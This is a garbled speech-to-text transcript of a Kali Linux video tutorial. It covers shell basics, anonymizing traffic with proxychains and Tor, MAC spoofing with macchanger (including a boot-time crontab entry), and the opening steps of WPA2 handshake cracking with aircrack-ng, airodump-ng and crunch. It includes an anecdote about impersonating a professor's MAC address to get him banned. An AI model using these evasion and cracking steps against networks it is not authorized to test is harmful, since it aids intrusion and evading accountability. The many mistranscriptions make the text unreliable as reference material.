and you want to see graph -
V if that exists.
Okay, so let's see

grab for both.
Yep.
So a verbose exists
and that is -
be and that's - -
verbose so explaining
what is being done.
So what happened out

here is basically
we took this first command
and then we filter it
and filtering is done

through the piping.
So basically think
about you taking some Ian
and pipelining it
through something else
which funnels it
out of this command
which is grip
so you can use MV /
help in conjunction with a bunch

of other commands just
on correct and I'll leave

the creativity up to you.
So grab is basically
used for getting
what you want from a file
and graph is used very very much

throughout the source
of this video through

this Kali Linux tutorial
that you're going

to be watching.
So that is a very
easy way to see
if you have a particular option
or let me do Against also

so CD / VAR now,
we're in the bar folder.
And let's LS.
We actually have name dot txt.
Now.
Let's also go into backups

OCD be and tapped and
that brings us back up folder
and we're now in the backup

folder Let's do an LS out here.
Okay, so we have
a bunch of files.
Okay.
We have some password dot back.
No see if you have cat

and you go password got back.
You can see the entire thing.
Now what?
What if you didn't want

this entirety of it or
if you want something
in particular you
want to be very neat
so you can do that same command.
You can pipeline it
and you can see grab and you

want everything with no login
so we can see
that there's a bunch of things
that say no login
and we only want those

and these are all the things
that say no login in them and
it's a much less a list

and it gives us a very
particular list that

you are looking for.
So that is how you use crap.
So now let's head back.
To home.
Okay, I've done wrong.
And again, let's see
what the next Monday's so

now let's start the XD.
So we've done crap.
We now have to do Echo Echo
and then touch OK let's go

back a few we press q
and we get out of there.
So what did I have

to teach again?
I'm such a dummy

we have do Echo.
Okay.
So what does it Echo used

for so suppose you will say Echo
and open code hello world.
It would basically do
what the man says that is.
Echo whatever you say now,

it'll say Echo hello world
and that will basically
Echo whatever you typed out

in the conditions.
That is Hello World

spelled very wrong.
Okay now suppose you want

to actually put this into a file
so you could do
Echo hello world.
Let's spell it properly

this time and you want
to answer in the file.
We had a phone number I guess

for number dot exe.
Yep, and we can Echo

it at that thing.
Now that was done now.
Let's see.
What is it phone
number DOT txt phone.
Dot txt and it says hello world
so you can basically input

text it to a certain file
with the echo command and

that's how you do it.
Okay.
Now let's also see
how you can make directories and

that is with the make directory.
Come on.
So, okay.
We also have to do
touch before that.
I forgot now Dodge is used for

quickly creating files so touch
for you could save touch

and then the file name
so we can create
a name file again
name dot exe or or

that will create a name dot txt.
Let me just show it

to you and I sell
and we have a name dot txt.
We can also create

multiple files with touch
and you could say file1 file2
and file 3 so like this
you can create multiple

files and let me just LS
that out and show it

to you and let cell
and we have five on file

to open files three now.
We can also create a directory.
So make dir and the name

of the directory.
So suppose you wanted to say All

your movies in One Directory,
they make directory movie
and now you have

directory called movies
and you can also

move into movies.
So CD movie.
Okay, so that's
how you create directories
and you can move into them with

the change directory folder.
Now, let's see what

the next command was.
So CD and dot dot so

fit CD dot dot you can move back
to the previous folder
if I'm already know told you
that and since we're in movies

we can just go back to home
with CD dot dot after now.
Let's see what else is there,

so Cat list Dot txt.
And okay now CH own
chmod now CH own will be

a little tough to show
because we don't have any sort

of a user or here.
The root user is the only user
that we have on this virtual

box and set up but
if you want to change

the ownership of a file,
so let's see
so you can see the ownership

of a file through the LSL.
Come on and you see

that root and root.
So this is owner name.
And this is the owner group and

they're mostly the same thing.
So our next command app
you're going to actually

see is called CH own.
So let's see how CH own

is actually used CSU own
is used for changing

the ownership of a file.
So a actually don't remember

how to use CH own.
So if you actually don't

remember or you're getting stuck
somewhere just use

the help function.
So if a command
line argument symbolic,
so let me just go
through this one.
So this is how you use it owner

and then call them group.
Okay, and then the file name
so you go CH own
and then you want to say

the name of the owner
and the group you wanted

to belong to that is root
and rude and then you

specify the name of the file.
So suppose I
won't change file one
that already belongs

to root and root
so it doesn't really matter
because I don't have
any other username to actually

change the ownership to
so this is how you

would normally change ownership.
where you can see the ownership

and that is LS -
L and I'll share the root

and root you see on file
one is basically
this is the owner.
This is the owner group.
They're normally the same thing

and the same name,
but if you had

some different owner
like a guest you could change it

by actually using the CH
own method the command methods

are different things.
I always get confused

because of the programming.
Okay.
Now the next command
that is left is called

chmod to actually show you
how chmod works.
Let me show you

an interesting file.
So suppose.
Let me just do this once okay
now Echo what you want to Echo?
Oh is let's Echo.
Hello world and let's put

that in quotation.
And we want to put

this in test now
once we've done that lets
Alas and we see
that we have
a test file out here
and we want to move test to test
our sh so tested sh
is the executable file
that is used in bash scripting.
So we move test to test

out sh the way you
actually execute batch files

on your command line is with .
+ / she say dot slash

and if I press T,
and I press tab.

You see that there is no options
that's coming up.
That is because they're start

sh is not an executable file
to test out sh is don't have

the executable permission.
So let me just show

that to you LS and you see test
or sh it doesn't
have the executable.
Now you see movie

it is executable.
I don't know why

it is a directory.
So it is an executable
you can move into it.
So it's blue and color.
So the way you I actually
can make this an executable is

by changing his permission.
So the way you do
that is chmod and basically

you change it to an executable.
So plus X that is
making an executable.
If you do plus RL
make it readable.
And if you do plus W

will make it writable also,
so if you do plus X
and do tests or SSH
and now you go and do LSL,
you'll see that SSH

has become green
because it is an executable file

now and now if you do dot slash
and you press T,

you get that Sh,
if I press tab,
so now it is
an executable file.
And if I executed it
presses out hello world

under the my screen.
So that's how you

can use the chmod
or which is basically the change

of emissions of files
and we'll be changing

permissions of files
throughout the course of

this video will be very useful
for us and you'll see
as we go along with this video.
Okay.
So the next thing
that I want to show

you only to our left
and I remember those now
and it is RM + RM is used
for actually removing.
A files so you
should be very careful
while using RM or any sort
of removing command
on a Linux system
because once you

remove something it is
very difficult to get it back

in as almost The Impossible.
It's not like Windows

where it's basically
just disappeared in
front of your eyes,
but it's still there in
the memory cluttering it all up.
That's why Linux

always Trump's Windows.
That's one of the reasons
and make a video

on that later on.
But for now,

let's focus on our M.
Now.
We can remove file one.
So, let's see so file one

is going to be removed.
So if he LS no,
you see 506 this but let

me show you our M.
And if I do movie
it'll say cannot remove

movie is a directory.
But if you go into the help menu

I bet there will be an option
that you can just

forcefully should move it.
So our M force will just

remove so our n /r
and you can do movie
and it will recursively remove

everything and if you go Hill
and do The LSL you'll see
that there is no movie.
He directory anymore.
And that is how you

can remove movies.
Now that problem
that you see out there is

actually a safety measure
because once you
remove a directory
and it's not retrievable,
that's a very sad scenario
and you don't want to get

yourself in such a scenario
in whatsoever possibility.
Okay moving on so on so forth
that was all about the RM folder

now you can do RM
and address of anything.
So RM, I know we moved

in address that the x
t so in The VAR folder

we can go our M VAR
and dress Dot txt.
And that will remove address

out the XD from the folder
of our let me just

show you that work.
So CD bar and LS and you see
that there is no address

or txt out here.
Okay, another way to get

help for any command
that you want is man

and suppose you want
to see what RM will show

everything about our M
that is there to show

to you show you
how to use use it'll give you

a description schnapps has named
remove files and directories.
It's a very useful way so out

here you see is the manual page.
So that is where means man
and you can press

line one nature.
You can press Q to quit.
So that's very much helpful.
OK guys.
So that was all

about the command line interface
and how we can use it to go

about the operating system
and change file permissions

copy fires move files
and a bunch of other stuff now

it's time to get on
with the interesting stuff
and that Is firstly we're going

to be learning how you
can actually see Anonymous

with proxy James OK guys.
So now that we are done

with the command line Basics.
It's time that we move

forward with proxy James.
So before we move forward

with proxy chains,
let us head back to PowerPoint

presentation and see what
exactly proxy chains are.
Okay.
So proxy chains now
as the name suggests

proxy chains are basically
a chain of proxies now,
where is the proxy used
a proxy is used whenever

you want to anonymize?
Has yourself on the wire
or the network?
You do not want to know or you

do not want to others know
what the source IP address was

for your client system
and to do this.
All you have to do is send

your package through a bunch
of intermediaries systems
and these intermediaries systems

carry the bucket out
and they transmit it

to the Target system.
And this is much

slower and let's see
how we can use this

in Kali Linux.
No in combination with tour

to in order to anonymize.
Pick not only

on web browsing traffic,
but rather instead on

all networks related traffic
generated by pretty
much older applications,
but you can also change

this in the settings.
Now, what we're going

to do is we're going
to open up the proxy

chain configuration file
and we're going to

understand all its options
that are available.
So to do that.
All you have to do is say no

you go into the ETC folder
and then you go
for the proxy chain
that conf and what

do you see out here?
Is in a new editor
and we had spoken

about Nano editor
when we were discussing

the CLI part.
I hope you haven't skip that now
what do you see

out here is a bunch
of instructions and options.
So let me just zoom in

into the Squall line interface
and now you can read

everything much well,
so what proxy jeans is well,
it gives you the ability

rather to draw out your traffic
through a series
of proxy servers
and stay Anonymous

in such a fashion by hiding
behind them or by having

them forward your request.
So it looks like
On the other side
that your requests are coming

from them as opposed
to you now surprisingly enough.
There are large amount

of these proxy servers out there
that you can use but they're

not very stable, you know,
they go up and down
and they're not very fast so

far specific targets,
they can be useful
but not for brute forcing
and not for any sort

of computing attack.
So suppose you're doing

something to certain Target
for trying to log in

or you're already logged
in you can definitely do it

through proxy chains,
and it will be reasonably fast

and reasonably stable.
As well, but
if you're doing some sort

of mass scanning
or your brute forcing a password
or something of a kind
of a proxy chain with a list
of proxies selected
from the internet,
especially the free proxies.
It's not going to work.
I mean it's going to work out

eventually in a technical sense,
but it will consume more time

than you can spare and by that.
I mean it can be
very very long time.
It can take about months

or two to do a simple scan.
So that's not an option and

there are other ways of doing
that but for the time being

I just want you to know
how you can use proxy jeans
and How you can configure

it and actually
because it's really useful
and I use it fairly

often a lot of people do
and it's a fantastic

piece of software.
So first off we have

the types of proxies.
So you see yes EDP socks

for and socks5 now,
they are fundamental differences

between these protocols
and you always want to find

yourself a socks5 proxy
as that's the best possible one
and that has the ability

to anonymize all sorts
of traffic scdp.
Well as a name it says

it's for HTTP traffic
and socks for Or is very similar
to Socks by but it
does not support IPv6 protocol
and it does not

support UDP protocol.
So this can be sucks for
and can be rather problematic

and you always want to make sure
that you're using socks5

wherever and however any way
down below you have

these other options,
which we will go over.
So basically how you

enable these options is
that you don't need to type

some complex lines of code
or anything of any kind

basically you all you have to do
is just leave the hash out here.
I'll show you so suppose we want
Do actually activate
Dynamic jeans option.
So all we have to do
is delete the hash.
But let's put

in the harsh right now.
So after you delete the harsh,
all you have to do is save

the file and the option
is enabled this hash presents

a commented out line meaning
that the system reading

this will ignore
if there is Harsh and
if there isn't hash it

will take it into consideration
and interpret it according you.
Anyway what we have

here are statements
which allow us to specify
how we want our traffic

to be routed the First
off we have Dynamic

chain Dynamic chain is a some
and is an option
which you will find

people using the most it
is most commonly used option
and a preferable want

to at that and honestly,
I think it's the best one

out there primarily
because it's the most stable one
and here's why now suppose

you have a b c d proxies.
So those are some servers

with IP addresses
with open ports.
And if you have

a strict chain policy,
which is enabled
on this computer right now
as you see if you have

a strict chain policy,
we can only be able

to access any site
on Internet in general
by going through ABCD.
So you have to go
through all of them
and you have to go through them

in that specific order.
That is ABCD and that's

not always a good thing.
I mean if you're paying

for 5 proxies,
that's not a problem
because they will

always be operational
and they will always be up
and why not that's

not a bad idea or an option
but there are however people
who use proxies for free and

they don't tend to pay for them.
Why would you pay for like

five proxies for simple scan
or something of that kind?
They're not free

and the a cost money and they're
rather expensive also,

but still, I mean the act
of paying itself identifies you
and kind of diminishes

the amount of anonymity you have
on the internet.
So some complex payment methods
can still be used

to actually anonymize yourself,
but it's fairly simple

to just use a dynamic chain.
So firstly we're going

to go ahead and uncomment
the dynamic chain option
and we're going to comment

out the strict chain option.
So strict chain will

no longer be used and I
will be using Dynamic chains.
And one more thing to note here.
Is that if you want

to use Rocky chains
in combination with door
if you want to Route

all your traffic
through the Tor Network

not just web traffic.
You must be
enabling Dynamic chains.
I mean, there's a chance
that it will work

with strict genes.
But give the instant

instability of door nodes.
It is highly unlikely.
You will need Dynamic jeans

and that is why I'm using them.
Anyway, if you're using

Dynamic changes just
give you the ability to go
from ABCD to your desired

destination by not having
to adhere to any order.
So let's say C is down

and you would go a b d
and it Woodworking
with no problems,
even if P was down

you would go to a d
and you would go and still

reach the destination.
So as long as one single proxy

is functional it's going to work
and you don't require

any specific order to do
it down below now down
below you have some other

options to so first is
random chains now random chains
in effect are basically
the same thing as

resetting your service.
I mean if you're
resetting your door,
you will be now assigned

new IP address in Taurus
is your new IP address

every 10 minutes or so.
Anyway with the random.
You can specify a list
of ips and then you

can tell your computer.
Okay, I want you to try
and I want you to connect

to this point and
every time you connect every
time you transmit the packet,
I want you to use

a different proxy
and we can do that as well.
And that's one of the options

definitely and you can see okay.
Use this is phone five times
and then change to another one

or some kind of like that.
There are a lot of options

to specify their family
the chain length

any way down below.
There's quite mode.
You don't really need

that then that's proxy.
DNS requests.
No leak from DNA.
Stata, this is very important.
You cannot have any DNA sleek

and let me explain to you what
DNS leaks are and even
though somebody cannot get

your particular IP address.
They can get the IP address

of the DNS server
that you are using and
that DNS servers do is resolved

main domain to the IP address
and vice versa.
So for example,
if you type in youtube.com,
the DNS server of your local

ISP provider will resolve
that into some sort
of IP address that YouTube has
and it will make a request.
No problem and you

do not want that happening
because Is your local DNS server

will be discovered
and that is information
that can be used
in order to figure out

your personal IP address.
And when that is done

your physical location
is pretty much compromised.
And that's an oval
and you definitely

need proxy DNS here.
It might slow you down a bit,
but without that you're

practically not Anonymous
and it's just a matter of time

before somebody finds you now,
if you go down below we have

some other options here,
but we're not really interested

in them at the moment.
What we here are for the formats
for entering proxies and I'm

going to leave it at that.
So what do you see out here

is first the type of the proxy
that is sucks 5 then the IP

address then the port number
and then two words
that Islam has secret

and then juice to Hidden.
Okay.
So now what you see out here
as I just said is
how you would actually write

down your proxy chains.
And now as I had already

also said you always want
to be using socks5 and you

don't want to be using HTTP
because they're not really
that safe and socks5

doesn't support a lot of Anyway,
and this is the IP address

of the proxy server
that we will enter a few

of them manually later on
and this here is the port number
that you see on which

the proxy server is listening
and that port is open

over here these two words.
Now what some proxy server
especially paid ones will always

have a username and password
so you can just type

them here in plain text
and fortunately it is assumed
that only you and you alone

have access to this computer
besides this file

and besides this file
is you not know.
Everybody can read

this file anyway,
so if you can just type

in the username here
and password here,
you will gain access

to a certain proxy
that you have chosen

or that you have paid for.
Anyway, these are

just some examples
and we won't actually

be using these proxies
or anything of the kind.
We need to go down
below here here you see
and at the end of the file.
So if I just press
enter a couple of times,
there we go.
So here is only one proxy active

at the moment and says socks
for and all traffic is routed

here through Tor by default.
So That to tour now and tardy

for listens on the sport.
So this 9:05 is report is white

or listens on now,
what we want to do is we want

to add socks5 proxy address.
So what you want to do

is just type in socks5
and the same IP address socks5
and you want to be keeping the

spacing correct just use tab.
So 127 dot 0 dot 0 dot one

and then you want to specify
the port number the

also so now 0 5 0 so
what you see out

here the 127. 0.021.
This is the loopback address

of your computer.
So this is for any

device communication and
if you're paying
this address and
if you're paying yourself

basically and usually
people think this address

in order to make sure
that the IP protocol

is set up correctly,
even though they don't have

internet connectivity.
So let's just type
in 1.27 dot 0 dot 0 dot one and

the same port number and 9:05.
So now we have to press Ctrl o

to save our You can save
on the same name
and we're o 65 lines of course

down and that's written
and now you have to press Ctrl X

and you exit out.
So let's press Ctrl L

and clear our screen now,
we just edited
our proxy change configuration
in a very neat environment.
So to go ahead and type

in our service door status.
So we want to check
status of our daughter.
So service tour still this so

torturous could not be found.
Sound so do we have
the torturers installed?
Okay sewed.
Our service is not installed.
Just give me a little moment

quickly install it.
Okay.
So now that we have set
up our broccoli
jeans configuration file
and we have put in a sock
5 proxy chain giving

it the torch service.
Now, what we need to do first

is start up our tour service
now to actually check
if the car is running or not or
if the door service

is running or not.
Let me just clear that out.
We need to go service
to our star.
And you see it

says it's inactive.
So what do you have to do

is say service to our star
and that will start

the tour service.
It might take some time

depending on the system
that you're using and what are

their it has started it for me.
Now what you have to do

to actually use proxy chains
before you go to any website.
So all I have to do
is say proxy chains,
then you specify the browser

that you're using.
So we're going
to be using Firefox
and you could say something

like www dot Duck duck duck
on so now here you will see
how your ping is

being transmitted to.
Dr. Go.com when I say thing,
I mean your packets

and your requests,
I'm sorry for my vocabulary.
So now your packets

are going to be directed
through a bunch of IP addresses,
but we haven't actually

put a bunch of you just
have put the loop back

for the Tor Network.
So we will let our do the rest

of the things for us.
Okay, so depending
on your system this

might take a little bit.
Of time to actually open up.
Okay.
So let's go ahead and see
what's actually happening

on the terminal
while this thing is loading up.
Okay, as you can see

it's going through a bunch
of proxies out of here
and some are denying it

and some are saying it's okay.
So as you guys can see most of

the time you might give tonight
and it will be a less

number of occasions
and that is exactly

what we're looking for
because primarily we have gone
a great extent for the anonymity
and what do you want

to do is stay like that.
So this is basically
how you Use proxy chains.
Now if this computer

just decides to open
up talk go.com on Mozilla.
I could actually show you

some interesting stuff
but it seems my computer

has kind of given up
on actually opening duck Taco

it still waiting for dr.
Goes actually confirmation,

but that's about it.
So this is how you can actually

configure proxy chains.
I'm really sorry
that my computer
isn't working right now,
so well and nothing

is actually opening on Mozilla.
It's mostly because

my Ram is over.
Loaded.
I think I should go
ahead and get myself a new Ram.
But for now,

let me just also say
that we can put

some custom proxy lists
and instead of just

saying let me just go ahead
and open up that file again
as you guys and see out here.

I'm going to end this right now
because my computer can't really

take all this pressure.
See it's like so hard.
Okay.
Let me just quit out of that and

let me just open up a new one.
Now as I had said
that you can put up

some custom proxy lists,
not really gonna do that.
But let me just show you.
You can do that you go.
No and you go cetera and proxy
so you basically have to go

into the proxy chain.
Okay, so I think I
should put this can yeah
now if you just go in

and edit out here,

setup Dynamic jeans
and you can go online and search
for free proxy list and

that will give you everything
that the port number

to the IP address.
Let me just show it to

you free proxy server.
Our list.
So all you have to do is search

for free proxy server list
and you can see out here

the proxy Davis scbs
and you basically want to find
a soft fire proxy to find

self a proxy just add
that into your keyword.
And once you find

those proxy addresses,
all you have to do is take

down this IP address
and followed by the port number
and you go ahead
and just put it down

in this configuration file
and then you hit control.
Oh and you just save it

and And you just go back.
So that was all

about proxy chains and
how you can set up Roxy change

to set make yourself.
Very Anonymous.
I'm sorry hold muscle, uh,
pardon work that's still

sad state of my computer
but moving on let's go ahead

and study about Max changes.
OK guys.
So that was all

about proxy chains.
Let's move ahead

to match changer.
Okay.
Now before we go into the tool

called Mac changer,
let's just see
what a Mac addresses now

Mac address actually stands
for media Access Control

address of the device
and is a unique identifier
assigned to a network interface.
Stroller for communication

purposes now a Mac addresses
are used as a network address
for most IEEE a certain

ethnic Technologies,
including ethernet Wi-Fi

and Bluetooth.
Now in this context

Mac addresses are used
in the medium Access

Control protocol sub layer
and as typically represented
as Mac addresses are

not recognizable as six groups
of two hexadecimal digits each.
Now, these are separated
by a colon and the first

three hexadecimals are
actually the organizationally

unique identifier.
So they actually
represent your vendor
and the next three Hexadecimal
is actually represent
your network card unique.
Okay, so when you are

actually on a network you
are recognized on something

called an ARP table.
Let me just show

you the ARP table
how you can see it.
Let's go in.
So the password is root

still an ARP table is
basically an address
resolution protocol table.
And well, this is

a virtual machine
and it doesn't really

know many machines
on the local network.
But if I were to go
on my Windows system and show

you my ARP table, let's see.
Okay, so if I show
you the ARP table
of my Windows machine
and on any machine
that has a TCP IP protocol

suit installed you
will have this command
as working called are

and you gave the -
A and now you see
that your IP address

or somebody else's
IP address is actually map

to physical address.
Now.
The MAC address

is very commonly used
in the our protocol and this is
how you are actually

identified on a network.
Now sometimes what you want
to do is be unknown
on this network.
There are various reasons

why you want to do that.
Let me just give you an example

of a very malicious.
Reason that was done
in my college.
So we asked students would

actually change the MAC address
of our own computer

to the professor's computer.
So we would somehow look up

the professor's IP address
and then come to know

about his Mac address
and then we would spoof

our Mac to be his Mac address
and then we would do

some tripe sort
of malicious activity
on the college internet
and then internet administrators
of our college
would come to know
that that Mac address

is doing some sort
of malicious activity and
that Mac address

would get permanently banned
for that session on the call.
Dish Network so basically
our professor would not be able

to use a wireless projectors
that he would use to actually

show us as presentations
and we end up
getting a free class.
Now.
I am not actually
promoting any sort
of bad activity like this.
I have just experienced this

in my own college life.
So that was something
but there are many other reasons
that you might want to spoof

your Mac now Mac changer
is an amazing tool
for actually spoofing your back.
So first of all,
how do you come to know

your Mac address?
So let's see you go ifconfig.
This will give us

our Mac address.
Now this dress
that you see out here is

the MAC address of this machine.
So you can also check

out the MAC address
by going Mark changer,
then let's type

in the help options.
And this will show us

how to get the MAC address.
So if you see
there's a show flag
so we can go Mac changer
and you can put the S and then

you put the interface now
the interface is
where it's working.
So at 0 is where we are.
Actually getting we
don't want the loopback one.
So at 0 and this will give

us the MAC address.
So I can't Mac address is

zero eight zero zero two seven.
Let's see if that was

the same one shown.
Where is that matter?
It's okay.
So if a 0 a 0 0 to 7,
so, I'm sorry.
This was the MAC address.
I selected the wrong thing.
What I was showing you is

the IPv6 address and you can see
that's very very long.
So, this is our Mac address.
Now what you might want to do

to change your Mac address.
Well, let's see with V

we can get the version
with s you can show

we can do the E.
And as I said,
if you remember that the first

three bits is about the vendors
so you can also get

the vendor list by going - L.
So you go -
L and this will give you

a list of Mac addresses
and which rendered

the belong to so sometimes
if you don't know the vendors
that are actually

being used on the network
of your college, for example,
and you want to

just stay Anonymous
and not raise any Flags.
Lakhs of Suspicion
so you could hide yourself
as a Cisco router.
So suppose your college

was using all sorts
of Cisco routers
and you decided that today.
I'm going to put myself

as a Cisco router
and I'm going to screw

around with the network.
So it would not raise any Flags
before you actually decide

to do some malicious activity
in some deeper inspection
of your Mac address people

would actually realize
that you are actually

spoofing the dress
and after some investigation

they put Andy take some time
to actually reach to you

and how you spoofed it,
but the And of Ginger Mac

is not raising any flags
and that is exactly

what you should try to do.
So Mac changer is also

very useful for getting the list
of all the Mac addresses

and the vendor IDs.
Now, let me just clear

the screen out quickly.
So we go clear and let's

bring back the help.
So we go matching
injure and - help.
Now, what we want to do is give

ourself a random Mac address
now Mac changer,

so that is Done
with the our flag
and we want to do it on F 0.
So once you run
that you will be given

a new Mac address.
So our new Mac

address is f6c 649
now you can verify

that by running ifconfig.
Now we could just do ifconfig
and you see our new

maxi dress is an ether
so we could also do something

like this ifconfig
and you could grab eater.
So that's just telling

you the MAC address
and this is completely new also.
You can show it to

the Mac changer tool itself.
Okay, so we need
to give it the e0.
I've got that now.
You see that this is

our current MAC address
and this is a permanent

Mac address and their two
are completely different.
Sometimes you also might want

to actually change your Mac
when your laptop is

or your system is booting up
because you might want

to stay Anonymous all the time.
Who knows and sometimes

you might think
I'll actually change it
when I want change it,
but let's face it we
We are forgetful as human beings

and we tend to forget things
that we are supposed to do.
So what else is better
than to actually automate

the whole process yourself
and forget about remembering all

these stupid nitty-gritty stuff.
So you can tell Linux
or cardigan enough
to actually change.
Your Mac address on boot-up

is use this tool called crontab
now crontab is actually used

for scheduling tasks on Linux.
So let me show you

how to do that firstly.
Let's clear our screen

and go crontab
and go Health now.
You see it's

a pretty small and menu.
So first we start
with it you flag that user
this file is going to work

for then we got the E flag,
which is for editing crontab

users the users crontab list
and you can see the list

of users crontab and let's see.
So do we have
any crunch all this?
So there is no crontab
at this moment so we can set
up one for ourselves
by going to the E.
Then there's the r
which is delete users crontab

and I want to tell you all be
very careful when treating

anything of that sort
because once you delete

something from The Knocks
that I've already said
that it It is very
very difficult to actually

retrieve it back.
You might get fragmented pieces

of what you had actually deleted
and that will only leave you

with sadness and Devastation.
Now, what you want to do is go

through crontab and press e
and this will bring us to select

an Editor to change later
on select editor.
So we'll do it Nano.
So what do you have out

here is the readme file
of crontab and if you read

this entire thing you will get
how to use crontab completely.
But if you have any sort
of doubts even after reading

it you can leave them down.
The comment section below now.
What do you want to do

is actually set up a crontab
so that you can change
your Mac address whenever

you reboot your computer.
So all you have to do
is say at reboot
what you want to

done is Mac changer,
and if you remember we want

to run the MAC address
and we want it on eat zero.
So that's done.
Now.
All you have to do

is save this thing.
So you go control.
Oh and that will write

it out you crontab
and you press enter
and you have ridden on one line.
Now you go control X

you have X is it out?
So now let us clear the screen

by pressing Ctrl L
and enter and let's go

ahead and get our Mac address.
So if we go ahead and run
that are Mac address

is set to f6c 649.
So just remember the first few

letters have 66 and 49 now.
Let me just reboot my computer

and you will see
after I reboot and run ifconfig

again with gravity table.
We will see a different

Mac address now rebooting
my take some time
because I'm actually

using Of washing machine
but still now it's given
problems with the Firefox.
But let's hope this

won't take much time.
Okay.
So now that our computer

has booted up
and we have actually opened

up a terminal let's go
in and type ifconfig and

let's get in our ether
that is the MAC address.
So if you remember
the MAC address now,
you see that it has

completely changed and that's
how you can spoof

your Mac address
on our local network.
And this will basically help you
in staying Anonymous
on our protocols and anything
that actually laughs your IP

address to the MAC address.
Okay.
So that was all

about math Changers meet you
in the next section.
So in this section,
we will be talking
about wireless encryption

protocol cracking.
So that is basically
Wi-Fi cracking now Wi-Fi
in today's day and age uses pins
or passwords to normally
encrypt the data usage.
Basically, if you want to access
the wireless access point,
you need a password
or a PIN to actually
gain authorization now
this authorization Chicken

is done using a for a handshake
which we will try to capture

using a tool called aircrack-ng
and then we will try

to crack into the password
using a wordless
generator called crunch.
Now, you can use aircrack-ng

to crack WPA and WPA2.
There's also another protocol

called WEP or WEP
and that is not normally

used these days.
If you find anybody using
that you should always advise

them to actually upgrade to WPA
or WPA2 because Wei.
EP is actually very
easily cracking these days
and people are generally

punished for using WEP
by hackers all around the world.
Okay.
So now you can actually go ahead

and go into a terminal
and type ifconfig to actually

look at your network card name
It's called wlo one.
So the first step
that we need to do to actually

go into the process
of Wi-Fi cracking is set

up our network access card
or our access point.
Monitor mode so
as you guys can see out here

after typing ifconfig.
It shows me
that my Wi-Fi access

God is wl1 interface.
Now our process of cracking

passwords is pretty simple.
What we want to do
is actually monitor
for all sorts of access points

that are nearby to us.
Once we have chosen

the access point that we
want to actually penetrate

into and find the password.
What you want to do is run

a narrow dumps can on it
and then we will try

and D authenticate any device
that is connected
to the access point now
one assumption out here
is that the password

is saved in that device
and it will automatically

try to re-authenticate
itself with the access point
and we want to catch and log

this re-authentication process
which will actually have

a four-way handshake
between your device

and the access point.
the procedure we are going

to follow now another thing
that you need to know

before actually using
this process to gain

any access to any Is
that you need to know a little

bit about what the password is?
Maybe it could be length

or it could be something
like a specific character

at a specific place.
Maybe you know

a series of characters.
So you just can't really guess

the password out of thin air.
That is not how cracking Works
unless you have

some unlimited potential
of processing power
in that case.
You can very well brute force it

and just find the password,
but if you are not somebody who

Has unlimited processing power
and you're trying

to use aircrack-ng.
You need to know a little bit

about the password.
Also before we proceed
with this wireless

encryption protocol cracking.
What I want to say is

if you want to get
into somebody's Wi-Fi network,
or you want to actually

test for vulnerabilities.
It's better that you test
for router vulnerabilities.
Then actually cracking

a Wi-Fi password
because you're more likely
than not to find

more router vulnerabilities
than actually successfully

Like a Wi-Fi password
if you don't know

anything about it,
if you don't know anything

about the password
just go ahead and run

some vulnerability tests
on the router itself and more

often than not you will just
find something you can abuse.
Okay.
Now let's talk

about the two tools
that I'm going to be using.
Now these two tools.
One of them is already

installed on Kali Linux,
but if you are not using

this on Carly,
you can also use this

on any Linux based system.
So what you have

to do is download
and All aircrack-ng,
which is easily installed
with the command

apt-get install aircrack-ng
and you also have to install

this word list generator
called crunch now crunch
is easily downloadable
by just Googling the name
and the first link

will be a sourceforge link
and all you have to do

is go inside that
and install it and

once you've figured out
how to install crunch

you can make sure
that its installed.
Now once you have installed both

the software's you can check out
if the manual pages

are opening up.
Let me just open the manual page

of aircrack-ng and show you
that it has been

properly installed.
Now as you guys can

see the manual page
of aircrack-ng opened up
and the manual page

of crunch is also opening up.
So that means both

of our software's
have been successfully

installed on our system.
Now before we go ahead.

how crunch actually works
so crunch is basically
a wordless generator.
What you would do is you try
and generate a word list

with given characters.
So what you can see out here
is I've typed in crunch 3/5,
so Means the minimum length is 3

and the maximum length is 5
and I've given it

a series of numbers.
So it will use these numbers

and generate all the words
that are possible

from length 3 to length 5.
So the way we are going

to use crunch in conjunction
with aircrack is
that we are going to use crunch

to generate the word list.
And then we are going

to pipe the word list
through aircrack-ng
when we are actually

trying to capture and crack
what we will capture

in a certain log file now.
What you want to do

first is actually put
your network interface card

on a monitor mode.
Now you can do
that by typing in ifconfig

and then the interface name
which happens to be wl1 and

first you have to put it down.
So I've config wl1 down now

to put your interface card
into monitor mode.
You have to type in IW config
and you go the name

of the interface
and then you go mode monitor.

Okay, it seems
I've spelled it wrong.
So let me just do it once again.
So that has put

our network interface card
into monitor mode
and what we need to do

after that is we need to start
up our network interface.
So all we have to do is type

in ifconfig wl1 up now.
Once it is up and running you

can check by typing in ifconfig
that indeed your network

interface card is up
and running don't worry

is running in monitor mode
if it's up and running
what we want to do next

is pretty important
to the whole process.
So what we want to do now.
Now is check for some services
that might still be running

in the background
that might hamper

with our whole scanning process.
So we do this by actually typing

in the command Area 1 and G
check and then the name

of the interface.
So as you guys can see nothing

is exactly running right now.
But if there were any process

running you would only add
a command airmon-ng check

and instead of writing
the interface name.
All you have to do is say kill.
It will kill any processes now
if you see Any process named

the network administrator
you want to kill

that process first separately
and then kill

any other child processes.
You may need to actually

run this command few times
before all the processes
are killed and then

you're good to go.
Okay.
So now that we have finished

killing all the subprocesses.
What we want to do is run
and error dumps can on

the network card.
So that is WL 1.
So for this we go Aero dump -
Angie and then we put in

the name of the interface.
And this will start the scan
that will look

So after you run

the aerodrome scan
on your interface,
what do you see out here is

a result of all the access point
that is found out

to the monitoring mode.
Now if you see we have a bunch

of columns out your first
of all we have the bssid column.
Now, the bssid column is

basically the MAC address
of all the routers

that are found.
No, every router obviously

has a MAC address.
So those are the MAC address
that is tied
to the router names,
which is shown by the SSID then

we How the pwr column we have
the beacons column we have

the data packets column.
Another important column

is a channel column.
It's important know
which channel your router

is working on.
Then we can see the cipher

column the authentication
so out here we can see

the encryption that is used.
So most of it is using WPA2.
So what we will be cracking is

basically WPA2 so from this is
what you need to recognize

is basically the Wi-Fi router
that you want to crack into now,
I'm performing this particular

test at my office.
Is and I don't really have

the permission to actually
go in and test them

for these vulnerabilities.
I'm not a security

analyst off here.
So I don't really
have the permissions

to penetrate into them.
So what I have done is I

have run a similar test
at home using my own Wi-Fi
and I will show you

the results for that.
But for this working example,
you will see the scans

that I'm running in this office.
So as we intend to stay ethical
what we are going to do out

here is we are going to capture
whatever we find in our office.
For on the educational purposes,
but when we are doing

the actual cracking step
that is the last step

of this whole procedure.
I'll be running it on a file

that I had generated at home
as I just said
because I have four missions

to do whatever I want
with my own Wi-Fi and passwords.
Okay.
So for this example,
